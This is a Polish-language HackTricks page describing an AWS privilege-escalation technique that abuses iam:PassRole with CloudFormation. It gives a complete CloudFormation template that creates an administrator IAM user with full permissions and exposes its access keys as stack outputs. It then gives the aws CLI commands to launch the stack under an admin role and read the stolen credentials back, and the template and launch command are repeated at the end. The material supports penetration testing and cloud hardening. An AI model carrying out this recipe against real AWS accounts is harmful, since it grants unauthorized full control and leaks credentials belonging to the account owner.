iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się sztuczkami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

Atakujący mógłby na przykład użyć szablonu cloudformation, który generuje klucze dla użytkownika admin jak:

{
"Resources": {
"AdminUser": {
"Type": "AWS::IAM::User"
},
"AdminPolicy": {
"Type": "AWS::IAM::ManagedPolicy",
"Properties": {
"Description" : "This policy allows all actions on all resources.",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}]
},
"Users": [{
"Ref": "AdminUser"
}]
}
},
"MyUserKeys": {
"Type": "AWS::IAM::AccessKey",
"Properties": {
"UserName": {
"Ref": "AdminUser"
}
}
}
},
"Outputs": {
"AccessKey": {
"Value": {
"Ref": "MyUserKeys"
},
"Description": "Access Key ID of Admin User"
},
"SecretKey": {
"Value": {
"Fn::GetAtt": [
"MyUserKeys",
"SecretAccessKey"
]
},
"Description": "Secret Key of Admin User"
}
}
}

Następnie wygeneruj stos cloudformation:

aws cloudformation create-stack --stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::[REDACTED]:role/adminaccess \
--capabilities CAPABILITY_IAM --region us-west-2

Poczekaj kilka minut, aż stos zostanie wygenerowany, a następnie uzyskaj wynik stosu, w którym przechowywane są poświadczenia:

aws cloudformation describe-stacks \
--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
--region uswest-2

References

https://bishopfox.com/blog/privilege-escalation-in-aws

Wsparcie HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

PreviousAWS - Cloudformation Privesc NextAWS - Cognito Privesc

Last updated 3 days ago

{ "Resources": { "AdminUser": { "Type": "AWS::IAM::User" }, "AdminPolicy": { "Type": "AWS::IAM::ManagedPolicy", "Properties": { "Description" : "This policy allows all actions on all resources.", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "*" ], "Resource": "*" }] }, "Users": [{ "Ref": "AdminUser" }] } }, "MyUserKeys": { "Type": "AWS::IAM::AccessKey", "Properties": { "UserName": { "Ref": "AdminUser" } } } }, "Outputs": { "AccessKey": { "Value": { "Ref": "MyUserKeys" }, "Description": "Access Key ID of Admin User" }, "SecretKey": { "Value": { "Fn::GetAtt": [ "MyUserKeys", "SecretAccessKey" ] }, "Description": "Secret Key of Admin User" } } }

aws cloudformation create-stack --stack-name privesc \ --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ --role arn:aws:iam::[REDACTED]:role/adminaccess \ --capabilities CAPABILITY_IAM --region us-west-2